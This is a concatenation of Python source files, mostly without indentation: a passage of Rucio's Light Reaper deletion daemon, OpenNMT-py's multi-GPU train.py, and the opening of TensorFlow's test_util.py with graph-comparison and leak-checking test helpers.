def reaper(rses=[], worker_number=1, total_workers=1, chunk_size=100, once=False, scheme=None):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
"""
logging.info('Starting Light Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, str(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
    hash_executable = hashlib.sha256((sys.argv[0] + ''.join(rses)).encode()).hexdigest()  # encode for Python 3 compatibility
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Light Reaper({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals()))
nothing_to_do = True
random.shuffle(rses)
for rse_id in rses:
replicas = list_expired_temporary_dids(rse_id=rse_id,
limit=chunk_size, worker_number=worker_number,
total_workers=total_workers)
rse = rse_core.get_rse_name(rse_id=rse_id)
rse_info = rsemgr.get_rse_info(rse)
rse_protocol = rse_core.get_rse_protocols(rse_id=rse_id)
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
deleted_replicas = []
try:
prot.connect()
for replica in replicas:
nothing_to_do = False
try:
# pfn = str(rsemgr.lfns2pfns(rse_settings=rse_info,
# lfns=[{'scope': replica['scope'].external, 'name': replica['name'], 'path': replica['path']}],
# operation='delete', scheme=scheme).values()[0])
pfn = 's3://%s%s%s' % (prot.attributes['hostname'], prot.attributes['prefix'], replica['name'])
# logging.debug('Light Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, total_workers, replica['scope'], replica['name'], pfn, rse)
start = time.time()
prot.delete(pfn)
duration = time.time() - start
logging.info('Light Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, total_workers, replica['scope'], replica['name'], pfn, rse, duration)
add_message('deletion-done', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica.get('bytes') or 0,
'bytes': replica.get('bytes') or 0,
'url': pfn,
'duration': duration,
'protocol': prot.attributes['scheme']})
deleted_replicas.append(replica)
except SourceNotFound:
err_msg = 'Light Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, total_workers, replica['scope'], replica['name'], pfn, rse)
logging.warning(err_msg)
deleted_replicas.append(replica)
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
err_msg = 'Light Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s' % (worker_number, total_workers, replica['scope'], replica['name'], pfn, rse, str(error))
logging.warning(err_msg)
add_message('deletion-failed', {'scope': replica['scope'].external,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica['bytes'] or 0,
'bytes': replica['bytes'] or 0,
'url': pfn,
'reason': str(error),
'protocol': prot.attributes['scheme']})
except:
logging.critical(traceback.format_exc())
finally:
prot.close()
delete_temporary_dids(dids=deleted_replicas)
if once:
break
if once:
break
if nothing_to_do:
logging.info('Light Reaper %s-%s: Nothing to do. I will sleep for 60s', worker_number, total_workers)
time.sleep(60)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=[], scheme=None,
exclude_rses=None, include_rses=None, delay_seconds=0, all_rses=False):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param threads_per_worker: Total number of threads created by each worker.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
"""
logging.info('main: starting processes')
if all_rses:
rses = [rse['id'] for rse in rse_core.list_rses()]
else:
rses = [rse_core.get_rse_id(rse=rse) for rse in rses]
threads = []
for worker in range(total_workers):
kwargs = {'worker_number': worker,
'total_workers': total_workers,
'rses': rses,
'once': once,
'chunk_size': chunk_size,
'scheme': scheme}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
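# Illustrative sketch (not part of Rucio): how a daemon entry point could wire stop() to
# SIGTERM and start the reaper threads defined above. The worker count and the choice to
# scan all RSEs are hypothetical.
def _example_entry_point():
    import signal
    signal.signal(signal.SIGTERM, stop)
    run(total_workers=2, chunk_size=100, all_rses=True)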
|
train.py
|
#!/usr/bin/env python
"""Train models."""
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.misc import set_random_seed
from onmt.utils.logging import init_logger, logger
from onmt.train_single import main as single_main
from onmt.utils.parse import ArgumentParser
from onmt.inputters.inputter import build_dataset_iter, \
load_old_vocab, old_style_vocab, build_dataset_iter_multiple, make_tgt
from itertools import cycle
from torchtext.data import Field, RawField
def main(opt):
ArgumentParser.validate_train_opts(opt)
ArgumentParser.update_model_opts(opt)
ArgumentParser.validate_model_opts(opt)
# Load checkpoint if we resume from a previous training.
if opt.train_from:
logger.info('Loading checkpoint from %s' % opt.train_from)
checkpoint = torch.load(opt.train_from,
map_location=lambda storage, loc: storage)
logger.info('Loading vocab from checkpoint at %s.' % opt.train_from)
vocab = checkpoint['vocab']
else:
vocab = torch.load(opt.data + '.vocab.pt')
# check for code where vocab is saved instead of fields
# (in the future this will be done in a smarter way)
if old_style_vocab(vocab):
fields = load_old_vocab(
vocab, opt.model_type, dynamic_dict=opt.copy_attn)
else:
fields = vocab
# @memray: a temporary workaround, as well as train_single.py line 78
if opt.model_type == "keyphrase":
if opt.tgt_type in ["one2one", "multiple"]:
del fields['sep_indices']
else:
if 'sep_indices' not in fields:
sep_indices = Field(
use_vocab=False, dtype=torch.long,
postprocessing=make_tgt, sequential=False)
fields["sep_indices"] = sep_indices
if len(opt.data_ids) > 1:
train_shards = []
for train_id in opt.data_ids:
shard_base = "train_" + train_id
train_shards.append(shard_base)
train_iter = build_dataset_iter_multiple(train_shards, fields, opt)
else:
if opt.data_ids[0] is not None:
shard_base = "train_" + opt.data_ids[0]
else:
shard_base = "train"
train_iter = build_dataset_iter(shard_base, fields, opt)
nb_gpu = len(opt.gpu_ranks)
print(os.environ['PATH'])
if opt.world_size > 1:
queues = []
mp = torch.multiprocessing.get_context('spawn')
semaphore = mp.Semaphore(opt.world_size * opt.queue_size)
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
q = mp.Queue(opt.queue_size)
queues += [q]
procs.append(mp.Process(target=run, args=(
opt, device_id, error_queue, q, semaphore), daemon=True))
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
producer = mp.Process(target=batch_producer,
args=(train_iter, queues, semaphore, opt,),
daemon=True)
producer.start()
error_handler.add_child(producer.pid)
for p in procs:
p.join()
producer.terminate()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
def batch_producer(generator_to_serve, queues, semaphore, opt):
init_logger(opt.log_file)
set_random_seed(opt.seed, False)
# generator_to_serve = iter(generator_to_serve)
def pred(x):
"""
Filters batches that belong only
to gpu_ranks of current node
"""
for rank in opt.gpu_ranks:
if x[0] % opt.world_size == rank:
return True
generator_to_serve = filter(
pred, enumerate(generator_to_serve))
def next_batch(device_id):
new_batch = next(generator_to_serve)
semaphore.acquire()
return new_batch[1]
b = next_batch(0)
for device_id, q in cycle(enumerate(queues)):
b.dataset = None
if isinstance(b.src, tuple):
b.src = tuple([_.to(torch.device(device_id))
for _ in b.src])
else:
b.src = b.src.to(torch.device(device_id))
b.tgt = b.tgt.to(torch.device(device_id))
b.indices = b.indices.to(torch.device(device_id))
b.alignment = b.alignment.to(torch.device(device_id)) \
if hasattr(b, 'alignment') else None
b.src_map = b.src_map.to(torch.device(device_id)) \
if hasattr(b, 'src_map') else None
# hack to dodge unpicklable `dict_keys`
b.fields = list(b.fields)
q.put(b)
b = next_batch(device_id)
def run(opt, device_id, error_queue, batch_queue, semaphore):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
single_main(opt, device_id, batch_queue, semaphore)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def _get_parser():
parser = ArgumentParser(description='train.py')
opts.config_opts(parser)
opts.model_opts(parser)
opts.train_opts(parser)
return parser
if __name__ == "__main__":
parser = _get_parser()
opt = parser.parse_args()
main(opt)
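# Illustrative sketch (not part of OpenNMT-py): parsing an explicit argument list instead of
# sys.argv, e.g. when driving training from another script. The -data and -save_model values
# are hypothetical placeholders.
def _example_programmatic_opts():
    parser = _get_parser()
    return parser.parse_args(['-data', 'data/demo', '-save_model', 'models/demo'])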
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
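# Illustrative sketch (not part of TensorFlow): NHWCToNCHW also accepts a plain shape list,
# so [batch, height, width, channels] becomes [batch, channels, height, width]. The shape
# values below are hypothetical.
def _example_nhwc_to_nchw_shape():
  assert NHWCToNCHW([1, 224, 224, 3]) == [1, 3, 224, 224]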
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
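# Illustrative sketch (not part of TensorFlow): the VECT_C layout folds channels into groups
# of four, so a hypothetical [2, 8, 8, 16] NHWC shape becomes [2, 4, 8, 8, 4].
def _example_nhwc_to_nchw_vect_c_shape():
  assert NHWCToNCHW_VECT_C([2, 8, 8, 16]) == [2, 4, 8, 8, 4]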
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
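# Illustrative sketch (not part of TensorFlow): skip_if wraps a callable so its body only runs
# when the condition is falsy. The GPU-presence condition is a hypothetical example and
# _example_skip_if_usage itself is never called by this module.
def _example_skip_if_usage():
  @skip_if(lambda: not gpu_device_name())
  def _check_runs_only_with_gpu():
    logging.info("running because a GPU device is visible")
  _check_runs_only_with_gpu()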
def enable_c_shapes(fn):
"""Decorator for enabling C shapes on a test.
Note this enables the C shapes after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
# pylint: disable=protected-access
def wrapper(*args, **kwargs):
prev_value = ops._USE_C_SHAPES
ops._USE_C_SHAPES = True
try:
fn(*args, **kwargs)
finally:
ops._USE_C_SHAPES = prev_value
# pylint: enable=protected-access
return wrapper
def with_c_shapes(cls):
"""Adds methods that call original methods but with C API shapes enabled.
Note this enables C shapes in new methods after running the test class's
setup method.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If C shapes are already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C shapes by default
# without breaking these tests.
if ops._USE_C_SHAPES:
return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCShapes", enable_c_shapes(value))
return cls
def enable_cond_v2(fn):
"""Decorator for enabling CondV2 on a test.
Note this enables using CondV2 after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
# pylint: disable=protected-access
def wrapper(*args, **kwargs):
prev_value = control_flow_ops._ENABLE_COND_V2
control_flow_ops._ENABLE_COND_V2 = True
try:
fn(*args, **kwargs)
finally:
control_flow_ops._ENABLE_COND_V2 = prev_value
# pylint: enable=protected-access
return wrapper
def with_cond_v2(cls):
"""Adds methods that call original methods but with CondV2 enabled.
Note this enables CondV2 in new methods after running the test class's
setup method.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_ops._ENABLE_COND_V2:
return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCondV2", enable_cond_v2(value))
return cls
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then
several times to let objects accumulate. The warmup helps ignore caches which
do not grow as the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") % (collection_key, size_before,
len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
      # In some cases (specifically on macOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
f(self, **kwargs)
else:
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
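# Illustrative sketch (not part of TensorFlow): a worked example of the helper above with
# hypothetical options; each OrderedDict in the result is one combination.
def _example_combine_named_parameters():
  combos = _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
  # combos == [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
  #            OrderedDict([("mode", "eager"), ("use_gpu", True)])]
  return combos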
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
  dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]`
or `option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)), "".join(
filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
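# Hedged sketch of the naming scheme used above: each key/value pair is
# reduced to its alphanumeric characters and appended to "_test". The option
# name "mode" is hypothetical.
def _example_generate_combinations_with_testcase_name():
  combos = generate_combinations_with_testcase_name(mode=["graph", "eager"])
  assert [c["testcase_name"] for c in combos] == [
      "_test_mode_graph", "_test_mode_eager"]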
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
